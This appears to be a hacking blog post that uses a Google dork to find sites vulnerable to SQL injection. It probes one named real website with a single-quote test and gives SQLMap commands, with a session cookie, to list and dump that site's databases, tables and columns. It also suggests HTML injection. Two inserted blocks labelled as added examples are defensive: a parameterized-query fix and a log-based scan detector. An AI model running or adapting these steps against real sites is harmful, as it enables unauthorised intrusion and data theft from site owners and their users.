Hacking remote database using SQL injection

What is SQL Injection

SQL injection is a technique of injecting malicious SQL queries through the query string of a website that is vulnerable to it. Using SQL injection, one can take over a vulnerable website by getting access to all of its data, deface it, tamper with existing data and a lot more. SQL injection attacks are extremely dangerous, and vulnerable websites are at high risk of leaking confidential data, which affects them as well as all their stakeholders. In this blog, I will show you how to find a website vulnerable to SQL injection and then exploit the vulnerability using a tool called SQLMap.

We are going to use Google dorks to find a vulnerable website. If you don't know what Google dorks are, please read my previous blog here.

Let's use a simple Google dork to find a vulnerable SQLi site:

inurl:index.php?id=

The above will return a large number of search results. Not all of them are vulnerable, of course, but they are good candidates for SQL injection if they do not sanitize the query string properly and thus execute the injected SQL query.
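The failure just described, as an added example that is not the site's code: a Python/sqlite3 stand-in for the MariaDB lookup behind a page like index.php?id=, with the query built by string concatenation next to a parameterized version. The Category table, its Identifier column and the rows are assumptions taken from the error message quoted later in this post.

```python
import sqlite3

# Constructed in-memory stand-in for the site's MariaDB "Category" table; the
# table and column names are taken from the error message quoted in the post,
# the rows are made up here.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Category (Identifier INTEGER PRIMARY KEY, Name TEXT)")
    conn.executemany("INSERT INTO Category VALUES (?, ?)",
                     [(36, "Rock"), (37, "Pop"), (38, "Country")])
    return conn

def lookup_vulnerable(conn, raw_id):
    """Builds the statement by string concatenation, the pattern behind the
    error in the post: whatever arrives in ?id= becomes part of the SQL text."""
    sql = "select * from Category where Identifier = " + raw_id
    try:
        return sql, conn.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        # A stray quote breaks the parser. Echoing the raw error to the visitor,
        # as the site does, is the tell the single-quote check looks for; log it
        # server-side and return a generic page instead.
        return sql, "DB error: " + str(exc)

def lookup_safe(conn, raw_id):
    """Hardened version: reject anything that is not an integer, then bind the
    value as a parameter so the database never parses user input as SQL."""
    if not raw_id.isdigit():
        return None, "400 Bad Request: id must be an integer"
    sql = "select * from Category where Identifier = ?"
    return sql, conn.execute(sql, (int(raw_id),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    for probe in ("37", "37'"):
        print("vulnerable:", lookup_vulnerable(db, probe))
        print("hardened:  ", lookup_safe(db, probe))
```

The parameter binding alone closes the injection; the integer check is defence in depth and also gives a clean 400 instead of a database error page.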

Quick check to find SQL injection vulnerability

Out of the search results returned by the above Google search, I spotted a website, karaoke.co.nz, vulnerable to SQL injection. Visiting the URL http://karaoke.co.nz/items/index.php?id=37 and then appending a single quote at the end of it shows that the site is not able to sanitize query strings properly. Check this URL:

http://karaoke.co.nz/items/index.php?id=37'

which gives the below error:

Unable to query local database to select Identifier
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
select * from Category where Identifier = 37'

Below is a partial dump of one of the DB tables of this site:

SQLMAP DUMP

To use SQLMap, download and install Python first from here. Once done, download and install SQLMap from here. Once installed, go to the location where sqlmap is installed and type the below command to get familiarized with SQLMap:
sqlmap.py --help

It will show the below results with the various options provided by it:

        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.3.11#dev}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

Usage: sqlmap.py [options]

Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)

  Target:
    At least one of these options has to be provided to define the
    target(s)

    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -g GOOGLEDORK       Process Google dork results as target URLs

  Request:
    These options can be used to specify how to connect to the target URL

    --data=DATA         Data string to be sent through POST
    --cookie=COOKIE     HTTP Cookie header value
    --random-agent      Use randomly selected HTTP User-Agent header value
    --proxy=PROXY       Use a proxy to connect to the target URL
    --tor               Use Tor anonymity network
    --check-tor         Check to see if Tor is used properly

  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to this value

  Detection:
    These options can be used to customize the detection phase

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)

  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques

    --technique=TECH    SQL injection techniques to use (default "BEUSTQ")

  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables. Moreover you can run your own SQL statements

    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --passwords         Enumerate DBMS users password hashes
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate

  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system

    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC

  General:
    These options can be used to set some general working parameters

    --batch             Never ask for user input, use the default behaviour
    --flush-session     Flush session files for current target

  Miscellaneous:
    --sqlmap-shell      Prompt for an interactive sqlmap shell
    --wizard            Simple wizard interface for beginner users

Use the below SQLMap command to list all the databases of the vulnerable site:

python d:\sqlmap\sqlmap.py -u www.karaoke.co.nz/items/index.php?id=37 -D database --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbs

The above will return the database names, claireg_karaoke and information_schema in this case.

Use the below commands to get the list of tables and other diagnostic data out of those databases.

Once we have the table names, let's get the column names using the below commands:

python d:\sqlmap\sqlmap.py -u www.karaoke.co.nz/items/index.php?id=37 -D claireg_karaoke --tables -T --columns "*" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbs

python d:\sqlmap\sqlmap.py -u www.karaoke.co.nz/items/index.php?id=37 -D information_schema --tables -T --columns "*" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbs

The above commands ("sqlmap-4" and "sqlmap-5") will return the columns of the table specified by <table name>. Once we have all the info dumped, we can use it in whatever way we need.

Once you have the column names, you can dump their values using the below command:

python d:\sqlmap\sqlmap.py -u www.karaoke.co.nz/items/index.php?id=37 -D information_schema -T PLUGINS --columns --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -C LOAD_OPTION, PLUGIN_AUTH_VERSION, PLUGIN_AUTHOR, PLUGIN_DESCRIPTION, PLUGIN_LIBRARY, PLUGIN_LIBRARY_VERSION, PLUGIN_LICENSE, PLUGIN_MATURITY, PLUGIN_NAME, PLUGIN_STATUS, PLUGIN_TYPE, PLUGIN_TYPE_VERSION, PLUGIN_VERSION --dump

It's also possible to dump the entire database using the option --dump-all.
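Seen from the server side, the single-quote check and the sqlmap enumeration above leave tells in the access log. The following is an added example, not part of this post or of sqlmap: a small detector run over constructed combined-format log lines. It flags a non-integer id value (the quote probe), sqlmap's default User-Agent, and, because --random-agent defeats the agent check, an IP that presents several different agents against the same script. The IPs, timestamps and agent strings are made up.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in combined log format (IPs, times and agents are made
# up). 198.51.100.9 keeps sqlmap's default "sqlmap/<version>" agent; 192.0.2.44 is
# a scan run with --random-agent, so only its agent churn gives it away.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2017:10:01:02 +0000] "GET /items/index.php?id=37 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2017:10:01:09 +0000] "GET /items/index.php?id=37%27 HTTP/1.1" 200 611 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Mar/2017:10:02:00 +0000] "GET /items/index.php?id=37 HTTP/1.1" 200 5120 "-" "sqlmap/1.1.3.11#dev (http://sqlmap.org)"
192.0.2.44 - - [10/Mar/2017:10:03:00 +0000] "GET /items/index.php?id=37 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11)"
192.0.2.44 - - [10/Mar/2017:10:03:01 +0000] "GET /items/index.php?id=37 HTTP/1.1" 200 5120 "-" "Opera/9.80"
192.0.2.44 - - [10/Mar/2017:10:03:01 +0000] "GET /items/index.php?id=37 HTTP/1.1" 200 5120 "-" "curl/7.52.1"
198.51.100.20 - - [10/Mar/2017:10:04:00 +0000] "GET /items/index.php?id=38 HTTP/1.1" 200 5100 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

def parse(line):
    """One access-log line -> dict of fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def findings_for(rec):
    """Per-request tells: the post's single-quote probe and sqlmap's default agent."""
    findings = []
    query = urlsplit(rec["target"]).query
    raw_id = dict(parse_qsl(query, keep_blank_values=True)).get("id")  # %27 -> '
    if raw_id is not None and not raw_id.isdigit():
        findings.append(f"non-numeric id={raw_id}")
    if "sqlmap" in rec["ua"].lower():
        findings.append("sqlmap user-agent")
    return findings

def scan(log_text, max_agents=3):
    """Findings per IP; an IP presenting max_agents or more different
    user-agents is flagged too, which catches --random-agent scans."""
    hits, agents = {}, {}
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        agents.setdefault(rec["ip"], set()).add(rec["ua"])
        for finding in findings_for(rec):
            hits.setdefault(rec["ip"], []).append(finding)
    for ip, uas in agents.items():
        if len(uas) >= max_agents:
            hits.setdefault(ip, []).append(f"{len(uas)} user-agents from one IP")
    return hits
```

These heuristics only shorten the time to notice a scan; the parameter-shape rule is the most robust of the three, and none of them substitutes for parameterized queries in the application.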
What more can be done to exploit this vulnerability? Let's try to manipulate the query string and change the HTML webpage.

Since the website is not able to sanitize the query string, we can insert an image into the HTML page by tampering with the query string. The below link shows the exploit:
 
HTML injection
 
 Happy hacking !!
 
Disclaimer: The content is for educational purposes only. Any unethical usage of the info on this website is not my responsibility.
 
Like us at GolibraryIndia to get regular updates.  
 

An avid reader, responsible for generating creative content ideas for golibrary.co. His interests include algorithms and programming languages. Blogging is a hobby and passion.